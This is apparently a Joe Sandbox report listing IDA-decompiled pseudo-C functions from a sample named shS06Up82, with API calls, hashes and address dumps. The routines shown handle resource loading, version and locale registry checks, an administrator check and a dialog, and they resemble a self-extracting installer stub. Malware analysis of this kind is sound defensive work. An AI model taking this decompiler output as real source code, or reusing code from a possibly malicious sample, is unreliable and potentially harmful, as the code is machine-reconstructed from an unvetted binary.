                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1314F71A00299AFDB229FA6DC88ABFBBBCFF04710F110629F545D6191D7309D05DB61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E003E468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				CHAR* _t14;
                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                      				long _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t14 = __ecx;
                                                                                                                                                                                                      				_t11 = __edx;
                                                                                                                                                                                                      				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                      				_t16 = _t4;
                                                                                                                                                                                                      				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                      					if(_t16 == 0) {
                                                                                                                                                                                                      						L5:
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                      					FreeResource(_t15);
                                                                                                                                                                                                      					return _t16;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                      • memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                      • String ID: TITLE$cent
                                                                                                                                                                                                      • API String ID: 3370778649-3553536280
                                                                                                                                                                                                      • Opcode ID: b0314a63322fca406ef2265118821ca9e7bf1caa78e3fefa268a4692ddaf0989
                                                                                                                                                                                                      • Instruction ID: b403c065b10f6c4f6d200a1d7f35844cf058d2b2418c14e79f7f44d91c6fd48c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0314a63322fca406ef2265118821ca9e7bf1caa78e3fefa268a4692ddaf0989
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9701F9362407907BE3321BA65C8CF2B3E2CDBCAF62F054214FA49AB1C0C9719C4082B2
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E003E681F(void* __ebx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                      				void* _v172;
                                                                                                                                                                                                      				int* _v176;
                                                                                                                                                                                                      				int _v180;
                                                                                                                                                                                                      				int _v184;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				long _t31;
                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                      				void* _t36;
                                                                                                                                                                                                      				intOrPtr _t41;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t36 = __ebx;
                                                                                                                                                                                                      				_t19 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                      				_t41 =  *0x3e81d8; // 0x0
                                                                                                                                                                                                      				_t43 = 0;
                                                                                                                                                                                                      				_v180 = 0xc;
                                                                                                                                                                                                      				_v176 = 0;
                                                                                                                                                                                                      				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                      					 *0x3e81d8 = 0;
                                                                                                                                                                                                      					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                      					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                      						_t41 =  *0x3e81d8; // 0x0
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t41 = 1;
                                                                                                                                                                                                      						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t31 = RegQueryValueExA(_v172, 0x3e1140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                      							_t43 = _t31;
                                                                                                                                                                                                      							RegCloseKey(_v172);
                                                                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                                                                      								goto L12;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t40 =  &_v176;
                                                                                                                                                                                                      								if(E003E66F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                      									goto L12;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                      									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                      										 *0x3e81d8 = _t41;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L12;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t18 =  &_v8; // 0x3e463b
                                                                                                                                                                                                      				return E003E6CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 003E686E
                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000004A), ref: 003E68A7
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003E68CC
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,003E1140,00000000,?,?,0000000C), ref: 003E68F4
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 003E6902
                                                                                                                                                                                                        • Part of subcall function 003E66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,003E691A), ref: 003E6741
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                      • String ID: ;F>$Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                      • API String ID: 3346862599-1716249293
                                                                                                                                                                                                      • Opcode ID: 3c38aac4ad6e9535de66726bd2639f202c3ef3f4c3106ad3eb961f90f1f27f18
                                                                                                                                                                                                      • Instruction ID: b2001789cda8929816d91a9b4e6d91a0b8f09d87a03439be0cb208423bd689d5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c38aac4ad6e9535de66726bd2639f202c3ef3f4c3106ad3eb961f90f1f27f18
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE315431A402A8DFDB32CB52CC46BAA777CEB95798F010395E94DAA1C1D730AD858F52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 57%
                                                                                                                                                                                                      			E003E17EE(intOrPtr* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                      				void* _v24;
                                                                                                                                                                                                      				intOrPtr* _v28;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                      				long _t28;
                                                                                                                                                                                                      				void* _t35;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                                      				intOrPtr* _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t14 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                      				_v12 = 0x500;
                                                                                                                                                                                                      				_t37 = __ecx;
                                                                                                                                                                                                      				_v16.Value = 0;
                                                                                                                                                                                                      				_v28 = __ecx;
                                                                                                                                                                                                      				_t28 = 0;
                                                                                                                                                                                                      				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                      				if(_t36 != 0) {
                                                                                                                                                                                                      					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                      					_v20 = _t20;
                                                                                                                                                                                                      					if(_t20 != 0) {
                                                                                                                                                                                                      						 *_t37 = 0;
                                                                                                                                                                                                      						_t28 = 1;
                                                                                                                                                                                                      						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                      							_t37 = _t39;
                                                                                                                                                                                                      							 *0x3ea288(0, _v24, _v28);
                                                                                                                                                                                                      							_v20();
                                                                                                                                                                                                      							if(_t39 != _t39) {
                                                                                                                                                                                                      								asm("int 0x29");
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							FreeSid(_v24);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					FreeLibrary(_t36);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                      			}




















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003E18DD), ref: 003E181A
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 003E182C
                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(003E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003E18DD), ref: 003E1855
                                                                                                                                                                                                      • FreeSid.ADVAPI32(?,?,?,?,003E18DD), ref: 003E1883
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,003E18DD), ref: 003E188A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                      • API String ID: 4204503880-1888249752
                                                                                                                                                                                                      • Opcode ID: e2693d9d0158dd9eebf2895c084e6fa7a9f593a9ddfc0426f47e499fb6c7dd29
                                                                                                                                                                                                      • Instruction ID: e253aef19a74c9750e99c0769f4d2be5487a356d332931a1169288dc3cf2e80a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2693d9d0158dd9eebf2895c084e6fa7a9f593a9ddfc0426f47e499fb6c7dd29
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55119331E00259ABDB129FA5DC89ABEBB7CEF44711F110669FA06E62D0DA709D04CB91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				struct HWND__* _t12;
                                                                                                                                                                                                      				int _t22;
                                                                                                                                                                                                      				struct HWND__* _t24;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t7 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t7 == 0) {
                                                                                                                                                                                                      					EndDialog(_a4, 2);
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 = _t7 - 0x100;
                                                                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                                                                      					_t12 = GetDesktopWindow();
                                                                                                                                                                                                      					_t24 = _a4;
                                                                                                                                                                                                      					E003E43D0(_t24, _t12);
                                                                                                                                                                                                      					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                      					SetDlgItemTextA(_t24, 0x838,  *0x3e9404);
                                                                                                                                                                                                      					SetForegroundWindow(_t24);
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t11 == 1) {
                                                                                                                                                                                                      					_t22 = _a12;
                                                                                                                                                                                                      					if(_t22 < 6) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t22 <= 7) {
                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                      						EndDialog(_a4, _t22);
                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t22 != 0x839) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0x3e91dc = 1;
                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3486
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 003E3490
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 003E349A
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 003E34B2
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000838), ref: 003E34C4
                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 003E34CB
                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 003E34D8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 852535152-3940384054
                                                                                                                                                                                                      • Opcode ID: eeb447054edc7f9e653a296a74e98eb0dd9760d482ae5e74c839f8eb2f4deecf
                                                                                                                                                                                                      • Instruction ID: 7dc367e4abb59ce42d08796c54b7048e14236bc8ffd4197601ba2196c18c0d9c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eeb447054edc7f9e653a296a74e98eb0dd9760d482ae5e74c839f8eb2f4deecf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58019E312405F4ABC7275F67DC4C9AD3A68EB49701F028615F9469BAE0CA30AF41CF82
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E003E2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t16;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				char _t32;
                                                                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                                                                      				char* _t38;
                                                                                                                                                                                                      				char _t42;
                                                                                                                                                                                                      				char* _t44;
                                                                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                                                                      				intOrPtr* _t55;
                                                                                                                                                                                                      				CHAR* _t59;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				CHAR* _t64;
                                                                                                                                                                                                      				CHAR* _t65;
                                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t60 = __edx;
                                                                                                                                                                                                      				_t16 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                      				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                      				_t65 = _a4;
                                                                                                                                                                                                      				_t44 = __edx;
                                                                                                                                                                                                      				_t64 = __ecx;
                                                                                                                                                                                                      				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                      					GetModuleFileNameA( *0x3e9a3c,  &_v268, 0x104);
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_t17 =  *_t64;
                                                                                                                                                                                                      						if(_t17 == 0) {
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                      						 *_t65 =  *_t64;
                                                                                                                                                                                                      						if(_t21 != 0) {
                                                                                                                                                                                                      							_t65[1] = _t64[1];
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if( *_t64 != 0x23) {
                                                                                                                                                                                                      							L19:
                                                                                                                                                                                                      							_t65 = CharNextA(_t65);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t64 = CharNextA(_t64);
                                                                                                                                                                                                      							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                      								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                      									if( *_t64 == 0x23) {
                                                                                                                                                                                                      										goto L19;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E003E1680(_t65, E003E17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                      									_t52 = _t65;
                                                                                                                                                                                                      									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                      									_t60 = _t14;
                                                                                                                                                                                                      									do {
                                                                                                                                                                                                      										_t32 =  *_t52;
                                                                                                                                                                                                      										_t52 =  &(_t52[1]);
                                                                                                                                                                                                      									} while (_t32 != 0);
                                                                                                                                                                                                      									goto L17;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								E003E65E8( &_v268);
                                                                                                                                                                                                      								_t55 =  &_v268;
                                                                                                                                                                                                      								_t62 = _t55 + 1;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t34 =  *_t55;
                                                                                                                                                                                                      									_t55 = _t55 + 1;
                                                                                                                                                                                                      								} while (_t34 != 0);
                                                                                                                                                                                                      								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                      								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                      									 *_t38 = 0;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								E003E1680(_t65, E003E17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                      								_t59 = _t65;
                                                                                                                                                                                                      								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                      								_t60 = _t12;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t42 =  *_t59;
                                                                                                                                                                                                      									_t59 =  &(_t59[1]);
                                                                                                                                                                                                      								} while (_t42 != 0);
                                                                                                                                                                                                      								L17:
                                                                                                                                                                                                      								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t64 = CharNextA(_t64);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *_t65 = _t17;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                      			}






















                                                                                                                                                                                                      0x003e2b11
                                                                                                                                                                                                      0x003e2b18
                                                                                                                                                                                                      0x003e2b26
                                                                                                                                                                                                      0x003e2b99
                                                                                                                                                                                                      0x003e2bc8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2b9b
                                                                                                                                                                                                      0x003e2bae
                                                                                                                                                                                                      0x003e2bb3
                                                                                                                                                                                                      0x003e2bb5
                                                                                                                                                                                                      0x003e2bb5
                                                                                                                                                                                                      0x003e2bb8
                                                                                                                                                                                                      0x003e2bb8
                                                                                                                                                                                                      0x003e2bba
                                                                                                                                                                                                      0x003e2bbb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2bb8
                                                                                                                                                                                                      0x003e2b28
                                                                                                                                                                                                      0x003e2b2e
                                                                                                                                                                                                      0x003e2b33
                                                                                                                                                                                                      0x003e2b39
                                                                                                                                                                                                      0x003e2b3c
                                                                                                                                                                                                      0x003e2b3c
                                                                                                                                                                                                      0x003e2b3e
                                                                                                                                                                                                      0x003e2b3f
                                                                                                                                                                                                      0x003e2b55
                                                                                                                                                                                                      0x003e2b5d
                                                                                                                                                                                                      0x003e2b64
                                                                                                                                                                                                      0x003e2b64
                                                                                                                                                                                                      0x003e2b7a
                                                                                                                                                                                                      0x003e2b7f
                                                                                                                                                                                                      0x003e2b81
                                                                                                                                                                                                      0x003e2b81
                                                                                                                                                                                                      0x003e2b84
                                                                                                                                                                                                      0x003e2b84
                                                                                                                                                                                                      0x003e2b86
                                                                                                                                                                                                      0x003e2b87
                                                                                                                                                                                                      0x003e2bbf
                                                                                                                                                                                                      0x003e2bc1
                                                                                                                                                                                                      0x003e2bc1
                                                                                                                                                                                                      0x003e2b26
                                                                                                                                                                                                      0x003e2bda
                                                                                                                                                                                                      0x003e2bda
                                                                                                                                                                                                      0x003e2be6
                                                                                                                                                                                                      0x003e2be6
                                                                                                                                                                                                      0x003e2bf8

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 003E2AE6
                                                                                                                                                                                                      • IsDBCSLeadByte.KERNEL32(00000000), ref: 003E2AF2
                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 003E2B12
                                                                                                                                                                                                      • CharUpperA.USER32 ref: 003E2B1E
                                                                                                                                                                                                      • CharPrevA.USER32(?,?), ref: 003E2B55
                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 003E2BD4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 571164536-0
                                                                                                                                                                                                      • Opcode ID: 941f9629a7d8c0a67e650aaf853f1764f0b4d9bb75dec806e0724a0019a8aafd
                                                                                                                                                                                                      • Instruction ID: 7b5237d4b7c733a716d73f8fe06cb110af466c63e5976529f452e4d4979f41bd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 941f9629a7d8c0a67e650aaf853f1764f0b4d9bb75dec806e0724a0019a8aafd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD4137345082E69EDF279F308C44AFE7B6D9F56300F05429AE8C28B2C2DB745E86CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				char* _v12;
                                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                                      				void* _v20;
                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                      				int _v28;
                                                                                                                                                                                                      				char _v32;
                                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                                      				int _v40;
                                                                                                                                                                                                      				void* _v44;
                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                      				long _t68;
                                                                                                                                                                                                      				void* _t70;
                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                      				void* _t79;
                                                                                                                                                                                                      				void* _t83;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				void* _t88;
                                                                                                                                                                                                      				intOrPtr _t93;
                                                                                                                                                                                                      				intOrPtr _t97;
                                                                                                                                                                                                      				intOrPtr _t99;
                                                                                                                                                                                                      				int _t101;
                                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                                      				void* _t106;
                                                                                                                                                                                                      				void* _t109;
                                                                                                                                                                                                      				void* _t110;
                                                                                                                                                                                                      
